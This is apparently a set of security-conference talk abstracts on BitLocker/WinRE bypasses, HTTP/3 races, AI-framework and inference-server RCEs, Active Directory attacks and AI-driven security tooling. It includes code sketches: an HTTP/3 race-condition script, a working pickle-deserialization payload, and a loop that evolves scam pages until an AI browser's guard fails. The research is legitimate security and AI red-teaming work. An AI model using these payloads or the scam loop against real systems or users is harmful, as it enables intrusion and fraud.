In mid-2024, a global IT outage - triggered by a faulty CrowdStrike update - became the largest in history, impacting roughly 8.5 million devices worldwide. In response, Microsoft introduced the Windows Resiliency Initiative (WRI) - a bold vision for a self-healing, secure Windows platform designed to enable rapid recovery and autonomous remediation, ensuring systems can bounce back from failures without user intervention. At the heart of this initiative is the Windows Recovery Environment (WinRE), a foundational component embedded in over a billion devices. Once a simple recovery utility, WinRE is now evolving into the backbone of system resiliency, redefining how Windows safeguards continuity and reliability. Recognizing its growing importance, we conducted an in-depth security review of WinRE - examining its architecture, its interactions with other components, prior research, and potential attack surfaces - with the goal of uncovering new vulnerabilities. The review yielded 11 new CVEs that allow attackers to bypass BitLocker and extract all BitLocker-encrypted data; notably, most of the findings are purely logical in nature. In this talk, we will present selected findings from our research, demonstrate how we discovered and exploited new 0-day vulnerabilities, and outline our approach to strengthening WinRE's security. Beyond the vulnerabilities themselves, the talk serves as a practical guide to WinRE security research - covering its fundamentals, threat model, and essential tools - and shares the lessons we learned, to encourage the broader security research community to further explore the security of WinRE.
Security operations teams today are overwhelmed by massive volumes of raw telemetry. Transforming this ocean of data into actionable insights - whether during incident response, threat hunting, or when engineering new, advanced detection rules - is a highly manual, time-consuming, and expertise-driven process. While leveraging AI to streamline such investigations is widely discussed, practical, effective methodologies for doing so at scale are rare. It is neither feasible nor effective to simply "ask an LLM" to process billions of records and synthesize knowledge directly. In this session, we introduce a generalizable framework for building a continuous, AI-driven knowledge layer on top of raw security logs. Our approach leverages advanced LLM capabilities - including autonomous tool use and agentic behaviors - with human expert guidance. Attendees will see how LLMs can intelligently sample large log sets, cluster similar data, and generate meaningful abstractions. We will also detail how to construct agents capable of autonomously crafting, testing, and refining sophisticated queries - iterating until security objectives and validation checks are satisfied. We will conclude with a real-world demonstration, introducing the "behavioral layer": an AI-derived, continually updated abstraction that transforms otherwise opaque security telemetry into plain-English summaries, complete with MITRE ATT&CK mapping. This work empowers security teams to elevate triage, detection engineering, and investigation - without the prohibitive cost and bottleneck of continuous manual abstraction.
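To make the query-refinement loop described above concrete, here is a minimal sketch of one way such an agent could be structured. The three callables (an LLM-backed draft_or_refine, a log-store run_query, and the validate checks) are hypothetical stand-ins, not the speakers' implementation:

```python
# Minimal sketch of an agent loop that drafts, tests, and refines a hunting query
# until validation checks pass. The three callables are hypothetical stand-ins for
# an LLM call, a log-store client, and the session's "security objectives and
# validation checks" - this is an illustration, not the speakers' framework.
from dataclasses import dataclass
from typing import Callable, Optional

@dataclass
class Attempt:
    query: str
    sample_rows: list
    feedback: str          # why validation failed; fed back to the LLM next round

def refine_until_valid(
    objective: str,
    draft_or_refine: Callable[[str, list], str],           # LLM: propose or repair a query
    run_query: Callable[[str], list],                      # execute against raw telemetry
    validate: Callable[[str, str, list], tuple[bool, str]],
    max_iters: int = 5,
) -> Optional[str]:
    history: list[Attempt] = []
    for _ in range(max_iters):
        query = draft_or_refine(objective, history)
        rows = run_query(query)
        ok, feedback = validate(objective, query, rows)    # objective met? results sane?
        if ok:
            return query
        history.append(Attempt(query, rows, feedback))
    return None  # escalate to a human analyst instead of looping forever
```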
MS-DOS is dead. Except when it's not - when it's still running a real business workflow, or when the only copy of critical data lives inside a weird, password-locked format from 1992. Ever wondered what an MS-DOS program actually does under the hood? How memory and OS services worked before user/kernel-mode separation, and what "crypto" and "security" looked like when your whole world was INT 21h, TSRs, and raw bytes? In this talk we will demonstrate - through two real-life cases we encountered - how to unpack, reverse-engineer, debug, and patch two MS-DOS-based programs. "The QText Diaries": we recovered access to a trove of password-locked documents from a 1992 Hebrew/English word processor by identifying classic DOS packers, reconstructing the key-derivation flow from disassembly, and extracting the original plaintext password to decrypt the files. Along the way we'll ask an uncomfortable archival-security question: how do you protect a backup that must still be readable 40 years later, and can "strong encryption" stay strong when the tooling, platforms, and assumptions rot? "The Impossible Saga": a 1998 Clipper/xBase legal case-management system rendered dates incorrectly, making the software unusable past January 1st, 2026. We'll show how we mapped the date code paths, located the formatting logic, and fixed it with a single-byte patch, then validated it in a real-life deployment that still depends on it today. You'll learn why DOS extenders turn "simple reversing" into a rabbit hole of protected-mode memory maps, overlays, and debugger-hostile weirdness, and how platforms like Clipper/xBase actually behaved in the wild. You will also see how modern emulators, virtualization, and automation make this only marginally easier: faster iteration, better snapshots, same ancient tricks - and how digging through obscure corners of the internet can make (or break) your research.
What happens when you try to teach an AI to think like a pentester? I spent the last year building Kira, an agentic AI security researcher that achieved over 80% autonomous success against industry-standard vulnerable applications - with zero pre-existing knowledge of the targets. This talk isn't about the hype. It's about what broke, what surprised me, and the uncomfortable questions that emerge when your AI starts chaining multi-stage exploits without being explicitly told how. You'll see: real exploit chains Kira discovered autonomously (and the catastrophic failures); the "aha" moments that separated pattern-matching from actual reasoning; safety guardrails we built (and the ones we had to retrofit after... incidents); why certain vulnerability classes still require cognitive leaps traditional tools can't make. This is a technical deep-dive into training an AI red-teamer - complete with failure cases, ethical constraints, and the architecture decisions that made autonomous exploitation possible while (mostly) staying inside responsible boundaries. Target audience: offensive security researchers, red teamers, AI security practitioners, and anyone curious about the messy reality of building autonomous exploit systems.
AI Browsers don’t just browse for us, they think out loud, leaking their reasoning, decisions, and security blind spots straight into our hands. By sniffing and analyzing this stream of internal logic, we gained a first-of-its-kind view into how AI Browsers actually think and perceive the web. That insight quickly triggered our “BlackHat” instincts: we connected this data to another generative AI agent and ended up building the ultimate scamming machine. One that produces working, AI-guard-bypassing scams in minutes. One AI agent systematically scamming another, leaving us humans entirely out of the loop. In this talk, we show how tapping into AI Browser internals exposes predictable and abusable security blind spots, and how we weaponized this visibility using a GAN (Generative Adversarial Network). Instead of generating images like in the "old times", this GAN iteratively tests how AI Browsers detect scams and social-engineering traps. Red flags noticed - or, more critically, missed - become the GAN’s training signal, allowing it to refine attacks until the browser reliably fails. And when one AI Browser fails, it takes down every human relying on it. When our first GAN execution finished in under four minutes, the implication became clear: as AI Browsers go mainstream, attackers will be able to “GAN” perfect scams: no guessing, no fuzzing, no “spray and pray.” Just generate, test, exploit, repeat. To defend ourselves in an AI-browsed world, we must start thinking like attackers, and first things first: make AI Browsers stop talking so much.
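A rough sketch of the generate-test-refine loop described above ("GAN" in the speakers' loose sense, not a gradient-trained network). Both generate_scam_page and browser_verdict are hypothetical stand-ins for the generator agent and the instrumented AI Browser:

```python
# Rough sketch of the adversarial loop: a generator LLM produces a scam page, the
# instrumented AI Browser judges it, and the red flags it raised or missed become
# the next round's guidance. Both callables are hypothetical stand-ins; this is an
# illustration of the loop, not the speakers' tooling.
from typing import Callable, Optional

def evolve_scam(
    seed_brief: str,
    generate_scam_page: Callable[[str], str],   # generator agent -> HTML
    browser_verdict: Callable[[str], dict],     # AI Browser -> {"blocked", "flags_raised", "flags_missed"}
    max_rounds: int = 10,
) -> Optional[str]:
    guidance = seed_brief
    for _ in range(max_rounds):
        page_html = generate_scam_page(guidance)
        verdict = browser_verdict(page_html)
        if not verdict["blocked"]:
            return page_html                    # the browser (and its user) reliably fails
        # The browser's own leaked reasoning becomes the training signal.
        guidance = (
            f"{seed_brief}\n"
            f"Avoid the red flags it caught: {verdict['flags_raised']}\n"
            f"Lean harder on what it ignored: {verdict['flags_missed']}"
        )
    return None
```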
AI agent frameworks have rapidly become critical infrastructure, powering everything from chatbots to autonomous coding assistants. But in the rush to ship agentic AI, have we forgotten the security lessons of the past two decades? This talk presents findings from Cyata's ongoing research into agentic identity and AI agent security, including the first disclosure of multiple CVEs across popular AI agent frameworks, alongside the already-public LangGrinch (CVE-2025-68664). From deserialization injection to SQL injection, from sandbox escapes to SSRF, from stored XSS to integer overflows - it's déjà vuln: the classic vulnerabilities are now hitting AI agents. You will leave with a clear understanding of the emerging agentic attack surface and practical guidance for securing AI agent deployments.
HTTP/3, the latest version of the HTTP protocol, is one of the new protocols in town. Does anyone use it? Well, more than 35% of all internet-facing websites do! HTTP/3 runs over QUIC, originally developed by Google, which has taken security seriously - something reflected in its RFC. In this session, we will share HTTP/3's main features and dive into its internals, then share our research journey, including some of our attack scenarios. One of HTTP/3's most promising features is its ability to solve Head-of-Line (HOL) blocking: each request gets its own stream (to minimize bottlenecks between requests), so requests cannot block one another on the same stream. Does that mean race conditions are impossible in HTTP/3? In the session, we will cover our journey to overcome these limitations and "Make Fuzzing and Race Conditions Work in HTTP/3". During our research, we found that the level of tooling for HTTP/3 security testing, fuzzing, and particularly race-condition testing is lacking; therefore, we developed our own open-source tool, QuicDraw. Finally, we will demonstrate QuicDrawUI and exploit a 1-day race condition on a well-known identity provider hosted on a well-known cloud provider (over HTTP/3 :)). Attendees will be armed with the theory and tools required for their own HTTP/3 and QUIC research.
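To give a flavor of why per-request streams do not rule out races: the classic "withhold the last byte, then release everything at once" trick still applies, because the final bytes of many streams can be flushed in the same flight of QUIC packets. Below is a toy sketch using the aioquic library; the host, path, and body are placeholders, and this is only an illustration of the idea, not QuicDraw:

```python
# Toy illustration (not QuicDraw): stage N POSTs on independent HTTP/3 streams,
# withhold the last body byte of each, then release all final bytes together so
# they reach the server in the same flight of QUIC packets.
# Target host/path/body are placeholders - point this at a lab system only.
import asyncio
import ssl
from aioquic.asyncio import connect
from aioquic.h3.connection import H3_ALPN, H3Connection
from aioquic.quic.configuration import QuicConfiguration

HOST, PORT, PATH = "race-lab.example", 443, "/redeem"   # placeholders
BODY = b"coupon=ONLY_ONCE"

async def race(n: int = 10) -> None:
    config = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
    config.verify_mode = ssl.CERT_NONE                   # lab use only
    async with connect(HOST, PORT, configuration=config) as client:
        h3 = H3Connection(client._quic)
        stream_ids = []
        for _ in range(n):
            sid = client._quic.get_next_available_stream_id()
            h3.send_headers(sid, [
                (b":method", b"POST"),
                (b":scheme", b"https"),
                (b":authority", HOST.encode()),
                (b":path", PATH.encode()),
                (b"content-type", b"application/x-www-form-urlencoded"),
                (b"content-length", str(len(BODY)).encode()),
            ])
            h3.send_data(sid, BODY[:-1], end_stream=False)   # everything but the last byte
            stream_ids.append(sid)
        client.transmit()                                # flight 1: staged, incomplete requests
        await asyncio.sleep(0.1)
        for sid in stream_ids:
            h3.send_data(sid, BODY[-1:], end_stream=True)    # complete every request
        client.transmit()                                # flight 2: all last bytes together

asyncio.run(race())
```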
Have you ever wondered what happens when a CPU vulnerability is disclosed to the vendor? The CPU is the foundation of computing: if CPUs are insecure, the entire stack is insecure. CPUs are also hardware, with a published ISA and a set of features - breaking compatibility is not an option. So how do we do it? We will give a behind-the-scenes guided tour of the full-cycle CPU security process, based on a vulnerability reported to us a few years ago (Plundervolt). As with every vulnerability, we need to validate where we are vulnerable - but unlike software, we need to understand what goes on below the software. If things were not hard enough, there are also multiple hardware configurations and CPU generations that need to be checked. As these are physical devices, some "hacks" were required to scale and automate. Afterwards, we need to evaluate the risk in order to choose the appropriate mitigations, or enable a path for defeaturing when it affects sensitive flows. For example, certain vulnerabilities (like Plundervolt) are only mitigated for confidential computing, since kernel access is an attack requirement. For other vulnerabilities, we share suggestions and recommendations with operating systems and ecosystem partners on how to apply mitigations in code. And some vulnerabilities require strong cooperation between hardware and our software partners. We will then deep-dive into the microcode patching process, its limitations, and how we test, patch, and validate mitigations. To close, we will share how we proactively work on these kinds of issues - from simulation, fuzzing, and directed tests to "hacking" the infrastructure.
AI-first IDEs sit at the intersection of code execution, developer trust decisions, and high-privilege credentials. As these tools add agentic features, they increasingly behave like privileged automation, and any weakened trust boundary becomes exploitable. In this talk we will present original research on what happens when VS Code's Workspace Trust model is disabled. We demonstrate how this shifts the IDE's security posture: opening a repository can trigger unintended execution paths, enabling persistence, secret discovery, and lateral movement into cloud environments. We map the kill chain from repository delivery to credential access and cloud pivoting, highlighting where traditional controls often fail to catch IDE-native execution.
Cloud-focused malware is often noisy, opportunistic, and short-lived - frequently limited to test or research projects, with narrow capabilities and unstable implementations. VoidLink is neither. VoidLink is a newly uncovered, Chinese-developed malware built as a modular framework designed to evolve. Our analysis reveals an unusually clear maturation curve. What initially appears to be a year of active development with multiple iterations is, in fact, a complete, production-level malware framework written by AI in a couple of weeks. At its core, VoidLink looks like an attempt to build a full-featured Chinese alternative to modern commercial C2 ecosystems, heavily inspired by Cobalt Strike-style workflows. It combines kernel and cloud tradecraft into a single platform, including kernel-level components (LKM), eBPF-based mechanisms, cloud credential theft, and an ecosystem of 30+ capability modules. In this talk, we present an end-to-end teardown of VoidLink from three perspectives: the malware's technical architecture; the operator's workflow, capabilities, and OPSEC mistakes; and the developer's perspective, including how large language models were used to design and build an entirely new malware framework.
As organizations rapidly adopt AI frameworks and third-party components, traditional software vulnerabilities are increasingly being introduced into AI infrastructure. While AI security discussions often focus on model-level issues such as prompt injection, the most dangerous risks frequently arise from traditional software vulnerabilities within the frameworks that power AI systems. In this talk, we will present two vulnerabilities we discovered in Chainlit, a widely used open-source framework for building conversational AI apps (CVE-2026-22218 and CVE-2026-22219). The issues affect internet-facing AI systems and can be triggered remotely, enabling attackers to steal sensitive files, leak cloud API keys and secrets, and perform server-side request forgery (SSRF) on the AI framework server. We confirmed the vulnerabilities in real-world, internet-facing applications used by major enterprises, demonstrating how framework-layer vulnerabilities can escalate to cloud-level impact. We will walk through the technical details of the vulnerabilities and the exploitation chain that leads to server compromise and credential exposure. We'll also show how leaking artifacts such as cached conversation history, configuration files, or environment variables can reveal highly sensitive enterprise data.
In this talk we will explore the novel attack surface of hybrid clouds that contain both on-prem and cloud elements. We will start with an overview of Azure Arc, explore the unique features that introduce new primitives, and walk through our research approach to this domain. We will focus on vulnerabilities introduced by Arc Extensions, a crucial backbone of connecting edge machines to the cloud, and deep-dive into four RCE and EoP vulnerabilities our team discovered (CVE-2025-47988, CVE-2025-53729, CVE-2025-59494, and CVE-2026-21224). You'll leave this talk with a better understanding of this unique architecture, the new services introduced, and the complexities that come with adding cloud concepts to the on-prem environment.
Specialized inference servers are essential for organizations to scale AI deployments and maximize hardware utilization (GPU/TPU/CPU). In the largely open-source AI ecosystem, and especially with large models, these servers require distributed engineering, which introduces a new kind of risk. We found and reported multiple Remote Code Execution (RCE) vulnerabilities targeting essential communication channels within all major AI inference servers and proved that many of them are internet-facing. Alarmingly, the accepted best practices include critical logical flaws that spread via code reuse across well-known open-source platforms from Meta, NVIDIA, and Microsoft, as well as PyTorch-ecosystem projects such as vLLM and SGLang, affecting thousands of enterprise workloads. In this talk, we'll reveal, for the first time, the full technical PoC details of the RCE vulnerabilities and the disclosure process with the vendors. Join our critical case study on AI supply-chain shadow risks, security vs. performance trade-offs, and code-reuse dangers - vital lessons for implementing AI securely.
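The abstract does not name the exact flaw, but one canonical example of a logical mistake that propagates through code reuse in internal communication channels is deserializing peer-supplied data. The snippet below is a generic illustration of why `pickle.loads` on bytes from an untrusted peer amounts to remote code execution; it is not claimed to be the specific bug in any of the projects named above:

```python
# Generic illustration of the flaw class: unpickling bytes received from a network
# peer executes attacker-chosen code. This models "trusting the other end of an
# internal channel", not the specific vulnerability in any named inference server.
import pickle
import subprocess

class Payload:
    def __reduce__(self):
        # Whatever __reduce__ returns is called at unpickling time.
        return (subprocess.check_output, (["id"],))

malicious_bytes = pickle.dumps(Payload())     # what an attacker sends over the channel

# What a naive worker on the receiving end of an internal socket might do:
print(pickle.loads(malicious_bytes))          # runs `id` on the "server"
```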
Golden dMSA is a post-exploitation and privilege escalation method that exploits vulnerabilities in Managed Service Accounts (MSAs) within Active Directory forests. This attack enables adversaries to obtain Kerberos tickets and derive passwords for all delegated managed service accounts (dMSAs) and group managed service accounts (gMSAs) across the forest by temporarily compromising a single domain. Delegated managed service accounts are designed as enhanced MSAs with strengthened security controls. By design, non-privileged users should lack the permissions to enumerate these protected accounts. However, this attack method bypasses these restrictions, allowing unauthorized enumeration of dMSA and gMSA accounts from standard user privileges. Once an attacker gains control of any domain within the forest, they can leverage extracted cryptographic material and domain-specific data to algorithmically predict and reconstruct the passwords of all managed service accounts, effectively compromising the entire forest's service account infrastructure.
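To make the "algorithmically predict" claim concrete: a gMSA/dMSA password is not random state stored per account, it is recomputed on demand as a deterministic function of the forest's KDS root key, the account's identity, and a time-based key identifier. The real derivation uses an SP 800-108 counter-mode KDF with HMAC-SHA512 and several intermediate (L0/L1/L2) keys; the sketch below deliberately collapses all of that into a single HMAC purely to show the shape of the computation - it will not produce real Windows passwords.

```python
# Deliberately oversimplified sketch of why one leaked KDS root key compromises
# every managed service account: the password is a pure function of the root key
# plus identifiers an attacker can obtain or predict. Real Windows uses an
# SP 800-108 CTR-HMAC-SHA512 KDF with intermediate L0/L1/L2 keys; this single
# HMAC only illustrates the shape of the computation, not the actual algorithm.
import hashlib
import hmac

def toy_managed_password(kds_root_key: bytes, account_sid: str, key_epoch: int) -> bytes:
    label = f"{account_sid}|{key_epoch}".encode()
    return hmac.new(kds_root_key, label, hashlib.sha512).digest()

# With the root key extracted from one compromised domain, an attacker iterates
# SIDs and epochs to reconstruct current (and future) passwords offline.
pwd = toy_managed_password(b"\x00" * 64, "S-1-5-21-1111111111-2222222222-3333333333-4601", 361)
print(pwd.hex()[:32], "...")
```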
How can we tell when AI is being used, especially when exceptional results could be entirely human? As AI systems now routinely produce top-level work, exceptional performance alone no longer reveals how something was created. A handful of brilliant answers, or even a single outstanding result, can be misleading in both directions: they might look like AI but be human, or look human but be AI. Chess offers a unique lens on this problem. It's one of the few domains where human and machine decision-making can be compared move by move, and where anti-cheating systems have matured over years of encountering this problem. These systems have learned a crucial lesson: you cannot judge a player by a handful of brilliant moves in a single game. Instead, they assess how performance behaves across many decisions - how it varies with difficulty, how it degrades under pressure, and what patterns of error emerge over time. As a competitive chess player, I've seen firsthand that detection isn't about identifying forbidden moves, but about understanding behavior across sequences. Machines and humans don't reveal themselves in snapshots - they reveal themselves in patterns. This lens reframes AI detection as a familiar question. Instead of asking whether an output is impressive or suspicious, we ask: does it reflect the tradeoffs, constraints, and irregularities that characterize human thinking? This talk explores what chess anti-cheating can teach us about detecting AI use in other domains, and what "human" actually looks like when measured at scale.
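To illustrate the "patterns over snapshots" idea, here is a toy version of the kind of statistic chess anti-cheating looks at: not whether any single move matches an engine, but how move quality (e.g., centipawn loss) varies with position difficulty across a game. All numbers below are invented for illustration.

```python
# Toy illustration of "judge the distribution, not the brilliancy": humans tend to
# lose accuracy on hard positions, while an engine-assisted player stays suspiciously
# flat regardless of difficulty. All numbers are invented.
import statistics

def profile(centipawn_losses, difficulties):
    easy = [l for l, d in zip(centipawn_losses, difficulties) if d < 0.5]
    hard = [l for l, d in zip(centipawn_losses, difficulties) if d >= 0.5]
    return {
        "mean_loss_easy": statistics.mean(easy),
        "mean_loss_hard": statistics.mean(hard),
        "variance": statistics.pvariance(centipawn_losses),
    }

difficulty = [0.2, 0.3, 0.8, 0.9, 0.4, 0.7, 0.95, 0.1]
human      = [5, 0, 60, 110, 10, 45, 150, 0]   # errors cluster on hard positions
assisted   = [5, 4, 6, 3, 5, 4, 6, 5]          # flat, difficulty-independent accuracy

print("human   :", profile(human, difficulty))
print("assisted:", profile(assisted, difficulty))
```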
In 2025, coercion has become a valid primitive for lateral movement and privilege escalation. Whether attackers are targeting Domain Controllers or pivoting through networks, forcing authentication is key to bypassing traditional perimeters. We will map the current state of coercion attacks, from RPC interface abuse (MS-EFSRPC, MS-RPRN, and more) to complex DCOM object activation and WebClient abuse. We will explore how these methods differ and how the landscape is evolving with the resurgence of reflection attacks (CVE-2025-33073 and CVE-2025-54918). Attendees will leave understanding the coercion attack surface - not just 'what works', but how these primitives relate to one another and how to detect the broader behavior rather than just the tools.
GitHub Actions is broken. Attackers can now enjoy an RCE-as-a-service vector that can lead to significant downstream effects. In this talk, you will learn how I managed to compromise the repositories of Google, Microsoft and other Fortune-100 companies, simply by creating a pull request from a fork.
Security Operations Center (SOC) analysts still spend significant time manually documenting their investigation steps - notes that are essential for handoff, audit, and incident reconstruction but are often incomplete under pressure. Existing approaches summarize alerts or case artifacts but rarely capture the investigation process itself. We introduce a methodology for reconstructing SOC investigations using Multimodal Web Telemetry, a novel technique that automatically captures analyst activity by observing DOM mutations, UI transitions, and interaction events within web-based security tools. Using a web-app activity-capture tool, the system passively collects structural and visual signals and re-renders them into a unified representation, converting HTML artifacts into Markdown and aligning them with event traces to form a multimodal timeline. A generative model processes this telemetry post-hoc to produce coherent, human-readable investigation notes that maintain rolling context across analysts and shifts. While demonstrated in Microsoft Defender, the approach generalizes to any web-based SOC platform without backend integration. We present the architecture, an evaluation framework for measuring reconstruction quality, and practical lessons learned. We also discuss how this methodology enables new research directions, including autonomous investigation agents, SOC-aware recommenders, and large-scale datasets for playbook and SOP generation.
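A minimal sketch of the re-rendering step described above, assuming captured DOM snapshots and interaction events carry timestamps; it uses the markdownify package to turn HTML artifacts into Markdown and interleaves them into one timeline for a generative model to summarize. This illustrates the idea only, not the authors' pipeline.

```python
# Minimal sketch: convert captured HTML artifacts to Markdown and merge them with
# interaction events into a single chronological timeline that an LLM can summarize
# post-hoc. Illustrative only - not the authors' actual capture pipeline.
from dataclasses import dataclass
from markdownify import markdownify as html_to_md   # pip install markdownify

@dataclass
class Capture:
    ts: float          # epoch seconds
    kind: str          # "dom_snapshot" or "interaction"
    payload: str       # raw HTML, or a short event description

def build_timeline(captures: list[Capture]) -> str:
    lines = []
    for c in sorted(captures, key=lambda c: c.ts):
        body = html_to_md(c.payload) if c.kind == "dom_snapshot" else c.payload
        lines.append(f"### t={c.ts:.0f} [{c.kind}]\n{body.strip()}")
    return "\n\n".join(lines)   # this text is what the generative model consumes

print(build_timeline([
    Capture(1700000000, "dom_snapshot", "<h1>Alert 1234</h1><p>Suspicious PowerShell</p>"),
    Capture(1700000042, "interaction", "Analyst clicked 'Isolate device'"),
]))
```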
Azure access control relies on two interconnected systems: Entra ID for identity and RBAC for authorization. While often discussed separately, understanding their relationship is essential for building a more secure organization. This talk provides a foundational overview of how these systems evolved, how they work together, and where attackers find opportunities to move between them.
Peripheral drivers often fly under the security radar - and sometimes that blind spot leads straight into physical memory. In this talk, I will present a vulnerability in a card-reader driver that allows non-privileged user-mode applications to gain access to the DMA controller. Besides the obvious security implications - including unrestricted access to kernel memory and cheat development - the vulnerability provides a surprisingly powerful tool for memory research, enabling experiments with memory-mapped devices, the IOMMU, and other low-level components that normally can't be explored without specialized hardware drivers. The core challenge in exploiting this issue is that the DMA controller operates exclusively on physical addresses, while user-mode code has no visibility into the physical memory layout. I'll explain how this gap can be bridged to enable access to arbitrary memory regions, highlight several aspects and side effects of the controller's programming, and demonstrate it in action.
In a microcontroller, the Mask ROM is a read-only memory which is programmed at manufacturing time. Bits cannot be changed later, but they can be seen under a microscope. These ROMs are often used for boot memories or cryptography lookup tables. In this two-hour workshop, you will begin with a die photograph of the CPU from the 1989 Game Boy console. Using the instructor's open-source MaskRomTool software, you will mark rows and columns of bits, then teach the software to recognize the difference between ones and zeroes. By the end, you will have produced a disassembly of the ROM, allowing you to read the code that displays the trademarked logo at startup. Students should bring a recent Windows or macOS laptop. A mouse and some knowledge of assembly language are recommended but not required.
Cloud adoption, hybrid work, and now the rapid integration of AI are reshaping the fundamental mechanics of modern intrusions. Attackers operate with a one-to-many mindset, exploiting the smallest weakness to scale impact across identities, endpoints, SaaS, cloud control planes — and increasingly AI-powered workflows. As organizations adopt new technologies faster than security teams can harden them, adversaries inherit more attack surface and a dramatically larger blast radius. In this hybrid reality, standard lateral movement is now paired with vertical movement between on-prem and cloud environments, enabling attackers to traverse multiple architectural layers and abuse misconfigurations, privilege gaps, and identity relationships. AI adoption compounds this: new automation pipelines, service accounts, model-hosting environments, and data flows introduce fresh pivot points for attackers who are already skilled at chaining misconfigurations into high-impact compromise. Drawing on hundreds of deep investigations using Microsoft Defender’s cross-domain visibility, this session exposes how attackers weaponize identity, cloud privilege escalation, and architectural fragmentation to achieve both rapid extortion and long-term persistence. We’ll deep-dive into three real attacks — spanning cybercrime and nation-state operations — that illustrate how hybrid and AI-adjacent environments are exploited in practice. Rather than re-stating familiar TTPs, this talk presents a fresh perspective on the new physics of modern intrusions: how accelerating tech adoption expands attacker opportunity, how hybrid identity and cloud relationships create graph-shaped attack paths, and why defense must now leverage AI to reason across these complex, multi-domain relationships. Attendees will leave with a sharper, forward-looking mental model for the defense challenges — and opportunities — emerging in the cloud-AI-hybrid era.
As cybersecurity professionals, our understanding of malware threats is constantly evolving. In this presentation, we will analyze the StealC infostealer, focusing on a recently leaked web panel. We will explore its fundamental functionalities and reveal a significant Cross-Site Scripting (XSS) flaw that allows for session hijacking. By leveraging this vulnerability, we were able to gather data on the operators of the StealC malware. The core of our discussion centers on a particular operator. Through our investigation, we identified various pieces of data, gaining insights into the operator's methodologies and targets. We will also explain the implications of the XSS in terms of privacy, and show how it helped us trace the operator's likely country of origin - and even what computer they use.
This session presents a forward-looking exploration of modern identity detection, leveraging the latest advancements in Event Tracing for Windows (ETW). Security researchers, SOC analysts, and threat hunters will discover how recent enhancements in Windows event logging revolutionize the detection and investigation of sophisticated Active Directory attacks in on-premises environments. The presentation covers critical topics such as detecting DCSync operations, monitoring Group Policy Object changes, investigating LDAP activity, and uncovering Kerberos-based attack techniques. Practical strategies will be shared for integrating these new event sources into existing workflows, empowering defenders to strengthen incident response and proactively counter evolving threats. Participants will leave equipped with actionable insights to enhance their security posture and effectively tackle real-world adversaries targeting modern Active Directory infrastructures.
Large language models are increasingly used as automated judges to detect jailbreak attempts, classify prompt-injection attacks, and enforce GenAI security policies. In practice, their impact is often dominated not by catching attacks, but by the noise they introduce. These LLM-as-a-judge systems are commonly treated as reliable and objective, yet in real deployments they generate substantial false positives that directly affect security workflows. In this briefing, we present an empirical evaluation of several state-of-the-art LLMs used as jailbreak detectors on real production data. We show that these systems exhibit consistent instability: identical prompts are classified differently across models, repeated evaluations by the same model yield conflicting results, and even highly prescriptive, overfitted evaluation prompts fail to eliminate variance. As a result, the judge itself becomes a source of bias and decision drift. We conclude with concrete lessons for defenders, focusing on how to evaluate, test, and operationally constrain LLM-based judges to reduce noise and improve reliability in practice.
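A simple way to quantify the instability described above is to run the same judge on the same prompt repeatedly, and across models, and measure how often the verdict flips. The sketch below assumes a hypothetical judge(model, prompt) call that returns a label such as "jailbreak" or "benign"; it is an illustration of the measurement, not the authors' evaluation harness.

```python
# Sketch of measuring judge instability: repeat the same verdict request and count
# how often the label flips, both within one model and across models.
# judge(model, prompt) is a hypothetical wrapper around an LLM-as-a-judge API.
from collections import Counter
from typing import Callable

def flip_rate(judge: Callable[[str, str], str], model: str, prompt: str, runs: int = 20) -> dict:
    labels = [judge(model, prompt) for _ in range(runs)]
    counts = Counter(labels)
    majority = counts.most_common(1)[0][1]
    return {
        "labels": dict(counts),
        "disagreement": 1 - majority / runs,   # 0.0 = perfectly stable judge
    }

def cross_model_agreement(judge: Callable[[str, str], str], models: list[str], prompt: str) -> float:
    labels = [judge(m, prompt) for m in models]
    majority_label = max(set(labels), key=labels.count)
    return labels.count(majority_label) / len(labels)   # 1.0 = all models agree
```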
Why do we need to put AI in yet another piece of software? Because current web crawlers are just not good enough. In 2026, crawlers are sophisticated, using headless browsers to render SPAs and keeping track of (and deduplicating) endpoints. But crawlers still can't solve two hard problems. The first is authentication: they rely on humans to handle authentication flows and MFA. The second is "do no harm": the crawler doesn't care what exists on an endpoint and will happily "click" on logout, delete, wipe, and every other feature on the website. Both of these complicate the life of any web security researcher. I present Crawli, a new crawler that works hand in hand with an LLM to handle both of these problems, improving coverage in real-world challenges. The talk will cover the challenges, a new architecture, and results.
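A sketch of the "do no harm" half of the problem: before the crawler interacts with an element, an LLM classifies it as safe or state-destroying. The ask_llm callable, the prompt, and the label set are hypothetical illustrations, not Crawli's actual design.

```python
# Sketch of LLM-gated crawling: classify an element before clicking so the crawler
# never hits logout / delete / wipe. ask_llm() is a hypothetical completion call.
from typing import Callable

DESTRUCTIVE = {"logout", "delete", "payment", "destructive"}

def safe_to_click(ask_llm: Callable[[str], str], element_text: str, href: str) -> bool:
    verdict = ask_llm(
        "Classify this web control as one of: navigation, form, logout, delete, "
        "payment, destructive, other. Reply with a single word.\n"
        f"text={element_text!r} href={href!r}"
    ).strip().lower()
    return verdict not in DESTRUCTIVE

# The crawler would only queue elements that pass the gate, e.g.:
# for el in page.clickable_elements():
#     if safe_to_click(ask_llm, el.text, el.href):
#         frontier.append(el)
```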
Cloud-scale vulnerability triage is dominated by volume, ambiguity, and fast-changing infrastructure. In Microsoft Azure Networking, engineers must assess vulnerabilities across a diverse network fleet by correlating inconsistent free-text vendor advisories with internal inventory, device configurations, and live telemetry. Manual triage is slow, inconsistent, and toil-heavy, and often requires repeated re-triage as advisories and environments evolve. This talk presents NOVA (Network-agent Orchestrator for Vulnerability Analysis), a production system that automates end-to-end triage through deterministic, multi-agent orchestration inside Azure. NOVA coordinates 50+ task-specialized AI agents to interpret advisories, evaluate exploit conditions, map exposure to live environment data, and recommend mitigations. Instead of ad hoc prompting, NOVA enforces a deterministic, schema-validated workflow, while multi-agent refinement improves precision and reduces hallucinations. NOVA uses LLM inference to determine and explain whether a vulnerability applies under specific exploit conditions - something brittle pattern-matching and queries can't do reliably. NOVA synthesizes vendor PSIRTs, NVD updates, scanner outputs, internal inventory, historical triage records, configurations, and telemetry to generate a report that surfaces the key evidence engineers need: whether the issue applies, why, what is impacted, and what to do next. A continuous monitoring feed triggers (and re-triggers) triage when advisories change or new evidence appears. We share what it takes to operationalize agentic vulnerability triage in production, including measured results: >90% reduction in triage time and ~97% classification accuracy, plus approaches to measuring agent accuracy reliably in real-world deployments.
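One concrete piece of a "deterministic, schema-validated workflow" of this kind is forcing every agent's output through a strict schema before the next agent consumes it, so malformed or hallucinated fields fail loudly instead of propagating. A minimal sketch with Pydantic follows; the field names are illustrative, not NOVA's real schema.

```python
# Minimal sketch of schema-validated agent output: a triage verdict must parse into
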